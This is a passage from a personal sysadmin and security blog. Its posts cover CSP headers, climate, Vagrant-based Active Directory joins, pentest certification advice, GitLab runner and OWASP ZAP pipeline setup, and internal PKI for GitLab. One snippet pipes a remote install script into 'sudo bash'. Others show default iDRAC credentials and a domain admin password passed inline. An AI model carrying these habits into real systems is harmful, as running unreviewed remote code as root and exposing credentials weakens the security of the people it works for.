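For reference, CSP is nothing more than a response header. One way of setting it, as a heavily simplified sketch assuming Apache with mod_headers and a far simpler policy than my real one:

<IfModule mod_headers.c>
    Header set Content-Security-Policy "default-src 'self'; img-src 'self' data:"
</IfModule>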

Also, hooray for the CSP Evaluator tool!

That'll teach me to regularly scan and check my own site. :|

I was prompted to go check out my own CSP settings, thanks to Scott Helme's recent post -> I turned on CSP and all I got was this crappy lawsuit


kilala.nl tags: ,

View or add comments (curr. 0)

The price our grand-children were to pay

2021-08-11 08:14:00

We need change now.

Image courtesy of UN Climate Action.

"There's a price our grand-children will have to pay."

Remember that one? About the climate? We've been saying that for so long that we forgot what it means. Well, fun's over: we are those grand-children. My generation, the twenty-somethings I teach at school, my daughter! We're all going to pay the piper, starting this decade. 

The IPCC, an international cooperation of hundreds of scientists, has recently confirmed that what they've been saying for decades is not only true, it's also happening right now. 

The full report is a whopping 1300 pages, which is too much for mere mortals such as you and me to take in. But luckily there's friendly folks who create summaries.

Or as Zentouro puts it, if you really want to panic and feel desperate, try playing with the IPCC's Interactive Atlas, which shows you exactly how things will be changing in the short term.

To put it bluntly: all of us will need to pull together and start taking measures that we will not like. Forego travel-for-fun, drastically cut down meat consumption and your consumption of luxury goods overall. Bitter pills to swallow and all that. But if that means that the earth will only burn for fifty years instead of a hundred, I guess that'll be worth it. 

To make sure that it's not just us putting in the efforts, make sure to influence your local politics! It's not just the people who need to change, it's our nations and our companies.

Write to your representatives, to your congressmen, to your politicians. Refer them to the IPCC's summary for policy makers, refer them to the IPCC's FAQ on the AR6 report

It's time to get angry and to help make changes. It was time thirty years ago, but better late than never.


kilala.nl tags: ,

View or add comments (curr. 2)

Automatically integrate Vagrant-built VMs into VMWare ESXi and Active Directory

2021-08-05 15:49:00

I've been using Vagrant to build new VMs in my homelab, which saves me a boat-load of time. Afterwards I still needed to do a few manual tasks, to make sure the VMs integrate nicely into my Active Directory and my VMWare ESXi server. 

With a bit of fiddling, while setting up the Kubernetes cluster, I came to a pretty decent Vagrant provisioning script. In short, it does the following:

  1. Installs and enables open-vm-tools, so ESXi can see and manage the guest.
  2. Installs the realmd / sssd / adcli tool chain needed for Active Directory integration.
  3. Joins the VM to my AD domain, using my prepared realmd and sssd configs.
  4. Restricts SSH logins to the "linux-login" AD group and fetches SSH keys through sssd.
  5. Enables and restarts the relevant services.

The spots with ${MYUSER} and ${MYPASSWORD} are a privileged domain admin account. 


# VMware guest tools, so ESXi can see and manage the VM
apt-get install -y open-vm-tools
systemctl enable open-vm-tools
systemctl start open-vm-tools

# Everything needed for AD integration through realmd and sssd
apt-get install -y oddjob oddjob-mkhomedir sssd sssd-tools realmd adcli \
samba-common-bin sssd-tools sssd libnss-sss libpam-sss adcli policykit-1 \
packagekit

# Join the AD domain unattended; the admin password is fed in via stdin
cp /vagrant/realmd.conf /etc/realmd.conf
realm join --unattended --user ${MYUSER} corp.broehaha.nl <<< ${MYPASSWORD}

# Let sssd resolve sudo rules and drop in the prepared sssd config
echo "sudoers: files sss" >> /etc/nsswitch.conf
cp /vagrant/sssd.conf /etc/sssd/sssd.conf

# Only the "linux-login" AD group may SSH in; public keys are fetched through sssd
cat >> /etc/ssh/sshd_config << EOF
AllowGroups linux-login
AuthorizedKeysCommand /usr/bin/sss_ssh_authorizedkeys
AuthorizedKeysCommandUser nobody
EOF

systemctl enable sssd realmd ssh
systemctl restart sssd realmd
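
Afterwards, a quick sanity check that the join actually worked (the user name here is just a placeholder):

realm list
id jane.doe@corp.broehaha.nl
getent passwd jane.doe@corp.broehaha.nl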

kilala.nl tags: , ,

View or add comments (curr. 0)

Is OSCP a good place to start pen-testing certification?

2021-08-05 07:46:00

Someone on Discord recently asked me: "Is OSCP a good first cert for someone who wants to go into pentesting?"

I thought I'd share the response I gave them. I hope it's still a valid viewpoint, what with my OSCP being a few years ago.

========================

Yes, but no.

OSCP is entry-level stuff when you look at it from a technical perspective. All the exploits and vulns we need to work with during the exam are relatively clear-cut and you don't have to do any development yourself. 

What makes OSCP a heavy-hitter is the non-technical aspects: you are under incredible pressure (X boxes in Y hours, plus a full report), you are given a black-box environment with targets that could be (almost) anything. OSCP is about research skills, about time management, about perseverance.

If you do the PWK class work before the exam, you are almost fully prepped for the technical aspects (vuln types, exploiting vulns, etc). Doing a large part of the PWK labs will prepare you for the research part of the exam. Which leaves time management and perseverance, which are personal skills that you need to bring yourself. 

If you were to ask me for a better place to start, I'd look at eJPT first. 

Get your feet wet with the basics and something that's also recognized as a solid first start. 

I personally think OSCP isn't a good first cert because, if you're still getting to know your way around the tech basics, then you won't have enough time to learn-on-the-job during the exam. 

If you have a good background on Linux/Unix and Windows, knowing how their services can be abused and how privesc can be done, and you've actually done it a few times, then you're on the way. Ditto for vulns and exploits in webapps or other network services: if you understand them and can apply them, then at least you have the basics out of the way.

With the OSCP exam, there's no telling what you're getting! It could be relatively new software on a new OS, or it could be an antique application in a weird old language. 

If you know the basics of vulns and exploits, then you at least know what you're looking for. You will only have to learn the actual target on-the-fly.


kilala.nl tags: ,

View or add comments (curr. 0)

Dick would have enjoyed this: new addition to the lab

2021-07-29 14:45:00

A stack of servers and a phone

Last week was awesome! It was the last Friday before summer break, so I decided to move the class on Vagrant and Docker forward. This would give my Linux+ students a few cool things to play with during their holiday!

Next to that very fun day, one of my colleagues at ITVitae also gifted me a piece of old gear: a lovely, 2009 Apple XServe 3.1. Dick would've loved that, what with us both being Apple-geeks.

The drives were wiped, so I've found a way to image the MacOS 10.11 installer onto one of them. Aside from that: it has dual Xeons like my R410 and R710, 3x2TB of disks (one of which will move to the R710 for my lab) and 24GB of RAM.

This baby might be noisy and a bit underpowered, but it'll make a great Docker-host to complete my lab. Awww yeah!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Not renewing my CEH

2021-06-23 15:27:00

Over the past decade or two, I've put in a lot of study-time to garner certificates for continued professionalization. Some of'm I'm really proud of, some were fun or cool, some were frustrating and some were just "meh".

EC Council's CEH (Certified Ethical Hacker) is one of those "meh" certificates, where my biggest motivation for continued renewal was the dreaded HR-checklist. EC Council have a great marketing department, that's ensured that "CEH" is on many corporate security job requirements.

That's the only reason why I kept paying my annual dues. Never because I'm proud of it, or because I feel it adds to my profession, always for the market value. 

Not any more. 

Between the recent social media muck-ups, the debatable practices and the mediocre professional value, I've decided to stop sending my money to ECC. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Failure is a great teacher

2021-06-20 21:19:00

A few weeks ago I noticed that my Win2012 trial licenses are no longer tenable: a big change to my homelab is needed! Since then I've worked diligently on a few projects, all happening in parallel.

That's a lot of stuff going on!

As the title of this post says: failure is a great teacher and boy did I have a lot of failures! 😂

For now there's too much to sum up in great detail, so I'll get back to the deets later. For now, some stuff I ran into:

After a weekend with lots of hard work, my AD domain is stable and usable again. All GPOs work again, the syncing between DCs works, the DFSR for SYSVOL works again. And the migration of the issuing CA to 2019 has also completed, with hosts being able to auto-enroll and validate certs again. 

There's so much more to do though! Thank ${Deity} for my Jira boards!


kilala.nl tags: , , ,

View or add comments (curr. 0)

CompTIA Pentest+: objectives comparison between PT0-001 and PT0-002

2021-06-01 19:08:00

It's a bit late, but people studying for the Pentest+ PT0-002 beta exam can probably use a list of all the differences between versions 001 and 002 of the objectives. I reckon the list could also be useful for students who want to give it a shot in October / November, because very few study materials will be available. 

I've done a quick cross-reference of the objectives documents (also linked below), to make an Excel / CSV with the differences between the objectives. Careful, they're probably not 100% on the money.

CompTIA trainers get a licensed document that does a better job at explaining the differences, but we can hardly share that, right? My comparison document was made the hard way, literally cross-matching both objective documents. Hence why I may have made a few mistakes.

The official objective documents:

And here's CompTIA's official blog about the two exam versions.


kilala.nl tags: ,

View or add comments (curr. 0)

Dynamic DNS and a discovery about Unifi equipment

2021-05-29 21:07:00

It's odd that I've never had much of a use for dynamic DNS solutions, but now that I'm testing VPN access to my homelab I've also taken a look at Afraid.org's FreeDNS.

So far I'm enjoying the late 90s, early 2000s look-and-feel of their management interface. It's endearing!


kilala.nl tags: ,

View or add comments (curr. 0)

Homelab rebuild needed

2021-05-29 20:39:00

Well darn. The "slmgr -rearm" trick will no longer work, after renewing the trial licenses on my WinSrv 2012 boxen a few times. This means I'll have to rebuild my Active Directory and Certificate Services infrastructure on short notice. Better yet, it's time to do something with my/our partnership contract with Microsoft, to get official licenses for Win2016. 

Oddly, Nicola's instructions for making the iDRAC6 remote console work on MacOS no longer work for me. The connection that worked a month ago now reliably fails with "Connection failed". 

Luckily, Github user DomiStyle is awesome! They've prepared a Docker container that runs the iDRAC connection software and makes two local ports available: 5900 for VNC and 5800 for the web interface. It's excellent!
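From memory, running it boils down to something like the command below. I'm not sure about the exact image tag or environment variable names, so double-check DomiStyle's README before copying this:

docker run -d --name idrac6 \
  -p 5800:5800 -p 5900:5900 \
  -e IDRAC_HOST=192.168.1.120 -e IDRAC_USER=root -e IDRAC_PASSWORD=calvin \
  domistyle/idrac6

The IP is whatever your iDRAC lives on, and root/calvin are just Dell's well-known defaults.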


kilala.nl tags: , ,

View or add comments (curr. 0)

Know your limitations, even if it's "too late"

2021-05-27 10:55:00

I don't know if my old classmate René is still reading along. If he is, he'll nod approvingly and think to himself: "told you so". :)

I feel very heavy-hearted, because I'm letting a few awesome people (Stephen, Thomasina, Rick B. at CompTIA) down. 

I'm backing down from teaching the Pentest+ TTT. It seems that I’ve been harboring a lot of stress, piling on way too much for myself, without really noticing it. To make sure that I can still pay full attention to my family, my primary customer, my students at IT Vitae and my own studies, I have to drop this responsibility.

I was very much looking forward to helping CompTIA with Pentest+, but right now it would not be a smart thing to continue with.


kilala.nl tags: , ,

View or add comments (curr. 0)

DevChamps "Extreme Automation" training

2021-05-17 06:56:00

After completing PDSO's CDP (Certified DevSecOps Professional) two months ago, I was left wanting more. More CI/CD, more pipelines, more automation. That's when, via-via, I met Andrey Adamovich via LinkedIn. Andrey works with a collective of DevOps trainers, to teach his XA: Extreme Automation training.

To sum it up: I was looking for a little extra fun, to expand upon what I'd learned in the past two years and the price was right at €700 for a three-day training with all the labs neatly arranged for students. 

To summarize my impressions:

Would I recommend Andrey's class? Yes, especially to folks in my shoes (security engineer) who need a quick introduction to modern-day IT infrastructure.

As to what I've learned during class? Well, Ansible and Docker weren't new to me, but that's perfectly okay. Terraform was very nice to get to know better, while Packer and Kubernetes were eye-opening. 

My biggest take-away is that I'm behind the times on modern-day infrastructure. This class has helped me recognize some of my bigger knowledge-gaps, which means I can now address them. 

My first order of business in my homelab should be to attempt a complete rebuild, using Packer to create golden images and using Terraform to drive VMWare ESXi, instead of using Vagrant. From there on out, I should try to use my Gitlab instance together with K8s and Docker to run many of my services. Luckily I have two Dell servers for my lab, so I can repurpose an old laptop as Terraform+Packer box while using the smaller Dell to first test-run my configs. 

The sad part is, as Andrey mentioned halfway through day 3: he expects that within a few years many apps and services will move to a server-less model, like Lambda or Azure Functions. That means that >60% of what we learned in XA will become much less useful. 


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA closed beta for CASP+ CAS-004

2021-05-13 10:33:00

CompTIA often have beta releases for new versions of their exams. You'll notice my blog has articles dating back a few years, where I keep doing these beta tests, "for fun and profit". Most betas are open to all takers, but the CASP+ (advanced security practitioner) is "closed". With thanks to some very nice people at CompTIA I managed to get accepted into the closed beta. 

Took the test this morning, at home via the OnVue testing solution. As before my experiences with OnVue were decent. 

However! In a not-so-fun move, PearsonVue decided to do a big and unannounced IAM change! Anyone who tests via PearsonVue for CompTIA and who has also tested for other companies (such as Microsoft) has now been forced to take a new username. They literally changed everybody's login names, without warning them up front. And no, you also don't get an email. Now they have a warning on their login page, but last night I got a big fright because there was zero information!

Here's a few things I took away from the CAS-004 beta.

The exam gave me three hours and took me a bit less than two hours to power through, without going back to any questions. There were plenty of "bad" questions in there (see above) and a few where I honestly would not know the answer. Since this is a beta, I decided to pludge it without studying any of the books or materials.


kilala.nl tags: ,

View or add comments (curr. 0)

Exciting times ahead! Working with CompTIA

2021-05-02 09:12:00

pentest book

Wow, it looks like this is really happening! Amazing! :D

I was recently contacted by Stephen, from CompTIA's CIN. They wondered whether I'd be interested in teaching the TTT (train the trainer) for PT0-002 Pentest+ in October. 

It's daunting! It's exciting! It's gonna be a lot of fun! :)


kilala.nl tags: ,

View or add comments (curr. 0)

A short review of CompTIA Security+

2021-04-30 09:41:00

Earlier this year I completed CIN's TTT (train-the-trainer) for Security+, CompTIA's entry-level InfoSec certification. I hope to teach the subject matter at ITVitae or elsewhere in the near future, so I'd better prepare myself on the exam objectives. 

Overall I'm pleased with the body of knowledge covered by Security+; there's a reason why I frequently recommend the learning path to colleagues starting out in IT security. The BoK covers security fundamentals which I feel should be understood by anyone in IT: developer, engineer, risk management, I don't care. Everybody in IT should know this stuff. :)

Paul Jerimy's excellent security certification roadmap places Sec+ at the foundational level. There's no shortage of comparisons between Security+, SSCP, CISSP, GSEC, CEH and others on the Internet, for example this one. Most of us agree: Sec+ is foundational knowledge for those starting in IT. 

I sat the exam this morning, version 601, and I passed. Would've been worrisome if I hadn't! ;) 

I'm pretty happy with the exam's contents: there's a decent spread of topics covered and only two out of my 82 questions were worded sub-optimally. The PBQs actually were pretty good!


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA PT1-002 Pentest+ beta

2021-04-23 09:45:00

A little under three years have passed since I last took the CompTIA Pentest+ exam. Like last time, I took the beta-version of the exam. Just like last time, I decided to go into the exam completely blank, only taking a glance at the official objectives beforehand.

The OnVue at-home testing experience offered by PearsonVue, like always, was decent. The tooling works well enough, the proctor was communicative, waiting times weren't too bad. The software feels kind of intrusive, as to what it wants to do on your laptop, but at least it didn't want me to install anything, nor does it require admin-level rights. 

As to the exam itself, my experiences mirror what I felt back in 2018: 

I feel that the PT1-002 exam needs some polishing and a few corrections, but overall the level of difficulty and the type of questions asked do in fact do a fairly good job at testing someone with 2-3 years of pentesting experience.

I'm curious whether I've passed! As was said: I went in without preparation and there's definitely a number of objective areas where I don't have experience. 

EDIT:

A forum acquaintance reminded me of the following:

"You see a preponderance of exam items referring the same concept because the vendor is attempting to determine which of those (experimental) items to include in the (production) exam item pool. ... When taking a beta exam, you are helping to create the exam item pool for the initial public release of the exam, not taking the initial public release of the exam itself."


kilala.nl tags: , ,

View or add comments (curr. 1)

One of my mottos in life

2021-04-06 13:21:00

Hanekawa from Bakemonogatari

2009 is a long time ago, but I recall very much enjoying "Bakemonogatari" (explained here) back then. 

One of the lines from that show that's always stuck with me is something Hanekawa says multiple times. It's kind of become my tagline in life and work.

It matches my Jill-of-all-trades, T-shaped engineering approach. ( ^_^)

"I don't know everything, I just happen to know this."


kilala.nl tags: , ,

View or add comments (curr. 0)

Finished a lot of hard work: the CDP exam, Certified DevSecOps Professional

2021-03-04 10:10:00

I know, I know: the past weeks it's been nothing but Gitlab over here :D That's going to quiet down now. How did all of that get started though?

Back in January, I posted the following question on the BHIS Discord:

"When it comes to CICD, microservices and the whole modern API reality I'm quite out of my depth. I never was a developer, can't code my way out of a wet paper bag; was always on the sysadmin and secops side. 

Are you guys aware of any trainings or bootcamps that are squarely aimed at grabbing my demographic (sysadmin, secops) by the scruff of their neck and dumping them through the whole process of building a sample API, automated building and testing and then ramming it onto something like Azure or CloudFoundry? 

I've been on the sidelines of plenty of CI/CD work, helping DevOps teams with their Linux and security troubles... but now I really need to know what they do all day.

Anything commercial, that lasts multiple days and is from a reputable vendor would be absolutely great. I don't care too much about which solutions are used in said training. Key words may include: Spring.boot, Maven, Git, Azure DevOps, Github Actions, Fortify. Just an all-in-one "journey" would be lovely."

I asked around with friends and colleagues. Most folks weren't aware of any such trainings, though one pointed me at Kode Kloud, another suggested Dev Champs and two of them suggested Practical DevSecOps.

PDSO's CDP course, Certified DevSecOps Professional, listed selling points that matched what I wanted:

Having now completed the whole course and having passed the exam, here's my impressions about PDSO's CDP course:

My overall verdict, was the CDP course worth it? Yes, it was. I learned a lot, I got to mess around with a lot of cool tools and the exam was challenging.

One tip that I'd give students is to also run a CI/CD environment of their own, with more projects than the one or two in the labs. I have gained so much extra knowledge from running Gitlab in my homelab, with 6-7 vulnerable apps! It's been awesome and educational. 

A few of my fellow students asked for pointers on the exam. I wouldn't want to give anything away that's covered by the NDAs, but I can tell you this much:

Basically, be ready to do high-paced learning and studying on-the-fly. In that regards, this exam isn't too different from the OSCP pen-testing exam: the concepts are the same, but you will need to do research on the job :)

Most importantly:

  1. As John Strand always says: "Document as you go!" Take notes all the way through your work, don't put that off until the end.
  2. Clone your exam repository to your local computer and pull updates regularly! I lost 11 hours of work on my exam, because my Gitlab got reprovisioned.

kilala.nl tags: , ,

View or add comments (curr. 0)

Practical DevSecOps CDP exam: heart attack moment

2021-02-28 20:44:00

An erased git repository

Let me tell you! When you're 11.5 hours into a 12 hour exam, this is NOT a screen you want to see on your main Gitlab that holds all your exam code. ( O_o)

Thank ${Deity} I cloned it all to my local system.

To clarify that a little bit: the CDP exam I took today is a practical exam where you spend twelve hours hacking, testing and building code that manages an application infrastructure. The whole exam, like the labs during class, is "in the cloud", run by Practical DevSecOps. 

Around 1700, while trying to deploy a Docker container or two, my Gitlab runner became unresponsive and my Docker daemon died. Then the app webserver died. And then other students started piping up in chat that their labs were stuck.

Finally, around 1730 my Gitlab server (which holds all my exam code) was reprovisioned. That is: erased, rebuilt, re-installed. My work for the past eleven hours was gone. 

So as I said: thank ${Deity} I had cloned my git repositories to my local machine. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Quick notes: script to setup Gitlab runners and run as Ansible

2021-02-26 10:55:00

Just some quick notes I've been making on how to quickly get gitlab-runner up on a Linux box. I still feel very yucky about curl-ing a file into sudo bash, so I'll probs grab the file locally instead and make sure it doesn't do anything nasty.

The following example was used on my Ansible host, to install gitlab-runner and to have it run as the local "ansible" user account instead of root. It registers and starts two runners.

curl -L "https://packages.gitlab.com/install/repositories/runner/gitlab-runner/script.rpm.sh" | sudo bash
 
export GITLAB_RUNNER_DISABLE_SKEL=true; sudo -E yum install -y gitlab-runner
 
sudo gitlab-runner uninstall
 
sudo mkdir /etc/systemd/system/gitlab-runner.service.d/
cat > /tmp/exec_start.conf << EOF
 
[Service]
ExecStart=
ExecStart=/usr/bin/gitlab-runner "run" "--working-directory" "/home/ansible/gitlab" "--config" "/etc/gitlab-runner/config.toml" "--service" "gitlab-runner" "--user" "ansible"
EOF
 
sudo mv /tmp/exec_start.conf /etc/systemd/system/gitlab-runner.service.d/exec_start.conf
 
sudo systemctl daemon-reload
sudo systemctl enable gitlab-runner
sudo systemctl start gitlab-runner
 
sudo cp /tmp/broehaha-cachain.pem /etc/gitlab-runner/cachain.pem
 
read -p "gitlab reg token: " GITLAB_TOKEN
 
sudo gitlab-runner register --non-interactive \
--tls-ca-file=/etc/gitlab-runner/cachain.pem \
--tag-list ansible \
--name ansible.corp.broehaha.nl \
--registration-token ${GITLAB_TOKEN} \
--url https://gitlab.corp.broehaha.nl \
--executor shell \
--locked=false
 
sudo gitlab-runner register --non-interactive \
--tls-ca-file=/etc/gitlab-runner/cachain.pem \
--tag-list ansible \
--name ansible.corp.broehaha.nl \
--registration-token ${GITLAB_TOKEN} \
--url https://gitlab.corp.broehaha.nl \
--executor shell \
--locked=false

kilala.nl tags: , ,

View or add comments (curr. 0)

Over-doing it? Maybe... Almost time to chill a bit.

2021-02-20 17:13:00

Heh, it's a bit ironic, no? Six weeks ago I wondered whether I was over-doing it, with work and my studies. I'd just finished a few courses and two exams and was about to start with a new client. 

Not two weeks later I've taken another two classes and I'm about to take another exam. A twelve hour, practical exam followed by documentation and reporting. 

I've promised myself that, once I'm done with the exam, I'll spend a few weeks on nothing but gaming! Genshin Impact here I come! :)

EDIT:

Ah. I just realized: I start teaching class again in 6-8 weeks. That'll require prep-time too :D


kilala.nl tags: , ,

View or add comments (curr. 0)

Security testing OWASP Juice Shop in Gitlab CI/CD

2021-02-20 16:10:00

Gitlab pipeline

After finishing the awesome BHIS "Modern Webapp Pen-testing" class (January), I immediately rolled into the "Certified DevSecOps Professional" course. I am lacking in experience with CI/CD, while having to support DevOps engineers every day.

The CDP labs by Practical DevSecOps are okay, but only ever testing django.nV got stale.

What better way to learn about SAST, DAST, SCA and more than by running our beloved Juice Shop webapp through my own CI/CD pipeline?! :D 

Not only does this give me a private Juice Shop in a safe environment (my homelab), but it got me more familiar with Gitlab and all the things that come with DevSecOps / SecDevOps / Security in DevOps / however you wanna call it. 

The image above shows the Juice Shop project in my Gitlab, with its security testing and deployment stages. The last "Compliance" stage (with Inspec) didn't fit into the pic.

Running the pipeline builds a Docker image for Juice Shop, runs SAST, SCA, secret scanning and linters, then runs the Docker image on my testbox and runs Nikto, ZAP and SSLyze against it as DAST. All very much default/basic, but it's a start!
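As a rough idea of the shape (not my literal config, just a sketch of the stages), the .gitlab-ci.yml comes down to something like:

stages:
    - build        # docker build of the Juice Shop image
    - static       # SAST, SCA, secret scanning, linters
    - deploy       # run the image on the test box
    - dast         # Nikto, ZAP and SSLyze against the running app
    - compliance   # Inspec, which didn't fit in the screenshot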


kilala.nl tags: , ,

View or add comments (curr. 0)

Practical DevSecOps and their CDP training

2021-02-19 07:42:00

I've been mentioning Gitlab for a while now and you might wonder why the sudden change. :D I'm working my way through the CDP training from Practical DevSecOps.

I needed a crash course that took me through a practical example of CI/CD pipelines, from A to Z, in a hurry. I'm in security and I need to advise DevOps engineers who work on those pipelines every day. I found it harder and harder to relate to them without having gone through their journey myself. Intellectually I understood most of the concepts, but everything stayed very vague without me actually doing it hands-on.

So far the course is a resounding "okay". It's not wonderful, it's not bad, it's just that: pretty good. The slide decks are decent, the trainer narrating the videos has a nice voice, but the narration is quite literally reading from the text book. Some of the text on slides and in the labs was lifted directly from third party sources such as projects' Github pages or from articles like Annie Hedgpeth's series on running Inspec

They have a huge amount of online labs, which is good, even if they get repetitive. So what I've done is set up Gitlab in my homelab as well, and apply all the things the course teaches me to multiple intentionally-vulnerable web apps.

So I've got Git repos for Juice Shop (Node.JS and Angular), django.nv (Python and JS), Webgoat (Java), GoVWA (Go) and others, which I'm treating like they were projects for my simulated company. Each of these gets its own CI/CD pipeline to run code quality checks, SAST, DAST and automated build + deploy through Docker.

It's been one heck of a learning experience and I'm looking forward to the closing exam, which is another 24h practical exam. I love those!


kilala.nl tags: , ,

View or add comments (curr. 0)

Gitlab runner "shell" executor cannot upload artifacts

2021-02-17 20:30:00

When using a "shell" executor with gitlab-runner you may run into the following errors, when trying to upload artifacts to Gitlab.

ERROR: Uploading artifacts as "archive" to coordinator... error error=couldn't execute POST against https://gitlab.corp.broehaha.nl/api/v4/jobs/847/artifacts?artifact_format=zip&artifact_type=archive: Post https://gitlab.corp.broehaha.nl/api/v4/jobs/847/artifacts?artifact_format=zip&artifact_type=archive: proxyconnect tcp: tls: first record does not look like a TLS handshake

The issue here is that your "gitlab-runner" user account has picked up a http proxy configuration that's not sitting well with it.

In my homelab, the proxy settings are configured for all users using Ansible, through "/etc/profile". For the "gitlab-runner" user that apparently may be problematic when trying to talk to the internal Gitlab server. Quick and dirty work-around: unset the proxy settings from your environment.

echo "unset http_proxy; unset https_proxy" >> ~/.bashrc
echo "unset http_proxy; unset https_proxy" >> ~/.profile

kilala.nl tags: , ,

View or add comments (curr. 0)

Challenges running "owasp/zap2docker-stable" without docker:dind

2021-02-17 19:35:00

As part of the CDP course we're running unattended ZAP scans as part of integration testing, using the "owasp/zap2docker-stable" Docker container. The course materials tell you to run the CI/CD task using "docker:dind", a Docker-in-Docker solution. For some reason my Docker boxen aren't a fan of that; I'll have to debug that later.

Trying to run the ZAP container with a simple "shell" executor through gitlab-runner led to some fun challenges though! The course material suggests the following Docker run command:

docker run --user $(id -u):$(id -g) -w /zap -v $(pwd):/zap/wrk:rw --rm owasp/zap2docker-stable zap-baseline.py -t https://target:port -J zap-output.json

To sum it up: start the ZAP container, run the ZAP baseline script using your current UID and GID, mount your local directory as /zap/wrk and then write the results as a JSON file onto the mounted local directory.

This approach fails in two ways, unless you take the fastest and dirtiest approach: running everything as the "root" user account.

Either you use it with "--user $(id -u):$(id -g)" and then you get the error message "Failed to start ZAP :(". Or you run it without that setting, then ZAP runs but it cannot save the output file, with a "permission denied: /zap/wrk/zap-output.json" message.

The issue here is that the container has a very limited set of users (as it should) and your uid+gid are most likely not in there. Under normal conditions, the ZAP scripts inside the container run as "zap:1000:1000", but that user doesn't have write access to your user's directory on the Docker host.

So... If you're running the ZAP container directly on your host and not as DinD, then you'll need to set up a temporary directory and grant write access to it for either uid 1000 or gid 1000. The latter feels "better" to me. Then we'll end up with this (assuming Gitlab):

zap-baseline:
    stage: integration
    dependencies: []
    allow_failure: true
    tags:
        - shell
    before_script:
        - docker pull owasp/zap2docker-stable
        - mkdir output; chgrp -f 1000 output; chmod 770 output; cd output
    script: 
        - docker run --rm -v $(pwd):/zap/wrk owasp/zap2docker-stable zap-baseline.py -t http://target:port -J zap-output.json
    artifacts:
        paths: [output/zap-output.json]
        when: always 

kilala.nl tags: , ,

View or add comments (curr. 0)

WTF Apple? QA oversight with Big Sur bricks your device

2021-02-13 21:31:00

Whelp that's just wonderful. 

A QA oversight in Apple's Big Sur updater may lead to your system getting stuck in an endless loop. Worse, if your disk is encrypted using File Vault, you're quite completely hosed. Excellent explanation over here by Mr Macintosh.

Yet again this is a reminder to Always Make Backups!!!

So what's this little mixup Apple made in their quality assurance? The Big Sur updater does not check whether it has enough free storage space on your Mac to complete the OS installation. Depending on how much free space you have, the installer will either refuse to start, or it will start and then fail partway through. In the latter case, you're in trouble. 

With two of our Macbooks Air the install went fine, but Marli's MBA was the smaller 128GB SSD model. With 39GB free space things went tits-up. Thank ${Deity} that we hadn't enabled File Vault on this one. 

Now I can at least boot into recovery mode. Disk Utility refuses to properly image the internal storage to a USB drive, but at least dd still works. Man, this is not how I expected my Saturday evening to go. ( ; =_=)
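
For reference, from the Terminal in Recovery Mode that dd run boils down to something like this (a sketch; the device and volume names are examples, double-check with "diskutil list" before copying anything):

diskutil list                                      # find the internal disk, e.g. /dev/disk0
dd if=/dev/disk0 of=/Volumes/BackupUSB/mba.img bs=1m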


kilala.nl tags: , ,

View or add comments (curr. 0)

Practical DevSecOps: CDP labs example pipeline

2021-02-07 22:08:00

A pipeline in Gitlab

I'll talk about it in more detail at a later point in time, but I'm about a week's worth into the Certified DevSecOps Professional training by Practical DevSecOps. So far my impressions are moderately positive, more about that later. 

In the labs we'll go through a whole bunch of exercises, applying a multitude of security tests to a Gitlab repository with a vulnerable application. Most of the labs involve nVisium's sample webapp django.nV.

Having reached the half-way point after that one week, I noticed we had not yet touched two crucial parts of the DevOps / CICD pipeline, parts which I'm not at all familiar with. We're applying all kinds of tests, but we never did the steps you'd expect before or after: creating the artifacts, deploying and running them. As I've said before, I'm #NotACoder.

Instead of focusing on one of the next chapters, today I spent all day improving my Gitlab and Docker install by applying all the required trusts and TLS certificates. This, in the end, enabled me to create, push, pull and run a Docker image with the django.nV web app. 

If anyone's interested: here are the Dockerfile and gitlab-ci.yml that I used in my homelab. You cannot just throw them into your own env without at least changing usernames, passwords and URLs. You'll of course also need a Docker host with a gitlab-runner for deployment.

Note: the Docker deploy and execute steps show a bad practice: hard-coded credentials in a pipeline configuration. Ideally this should be solved with CI/CD variables or, even better, integration with a vault like Azure Key Vault, PasswordState or CyberArk PasswordVault. For now, since this is my homelab, I'll leave them in there as a test for Trufflehog and the other scanners ;)
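
For what it's worth, the variables approach would look something like this in the deploy job's script (the registry URL and variable names are made up for the example; the variables themselves get defined as masked CI/CD variables under Settings > CI/CD > Variables):

# credentials come from masked Gitlab CI/CD variables instead of the pipeline file:
echo "$DOCKER_PASS" | docker login registry.corp.broehaha.nl -u "$DOCKER_USER" --password-stdin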


kilala.nl tags: , , ,

View or add comments (curr. 0)

Integrating Gitlab into your lab with private PKI

2021-02-07 19:45:00

My homelab runs its own PKI and most servers and services are provided with correct and trusted certificates. It's a matter of discipline and of testing as close to production as possible. 

Getting Gitlab on board is a fairly okay process, but takes a bit to figure out. 

So my quick and dirty way of getting things set up:

  1. On ADCS generate a new, exportable key pair with the right settings. 
  2. Run this keypair through a locally created .inf request file with an extension for the subject alt. name (see example).
  3. Issue the requested cert and import it.
  4. Export the full keypair plus cert as a PKCS12 / .pfx file.
  5. Transfer the .pfx to the Gitlab server and store safely in "/etc/gitlab/ssl/". Set to ownership by root, and only readable by root. 
  6. Use "openssl" to extract the private key and certificate from the .pfx file. Then use it as well to decrypt the private key. 
  7. Replace the pre-existing gitlabhostname.crt and gitlabhostname.key files with the newly extracted files.
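
Step 6 spelled out (the .pfx name is a placeholder; the .crt and .key names match the files mentioned in step 7):

# pull the certificate and the (still encrypted) private key out of the PKCS12 bundle:
openssl pkcs12 -in gitlabhostname.pfx -clcerts -nokeys -out gitlabhostname.crt
openssl pkcs12 -in gitlabhostname.pfx -nocerts -out gitlabhostname.key.enc
# strip the passphrase off the private key:
openssl rsa -in gitlabhostname.key.enc -out gitlabhostname.key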

Now, you also want Gitlab and your runners to trust your internal PKI! So you will need to ask your PKI admin (myself in this case) for the CA certificate chain. You will also need the individual certificates for the root and intermediate PKI servers. 

  1. In your Gitlab host, copy the individual PKI certificates into "/etc/gitlab/trusted-certs". 
  2. On your Gitlab runner hosts, copy the CA chain into "/etc/gitlab-runner" and reconfigure "/etc/gitlab-runner/config.toml" so each runner has a line for "tls-ca-file". 
  3. If you haven't done so already, make sure the rest of your Linux host also trusts your PKI by importing the certs (see the sketch after this list).
  4. According to the Docker manuals, Docker uses both its own config file and the Linux/Windows central trust store. So completing step #3 is good enough. But, Docker will only pick up new certs after you restart the engine!
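
For step 3, the exact commands depend on your distro; roughly (a sketch, the chain file name is an example):

# Debian/Ubuntu:
sudo cp corp-ca-chain.pem /usr/local/share/ca-certificates/corp-ca-chain.crt
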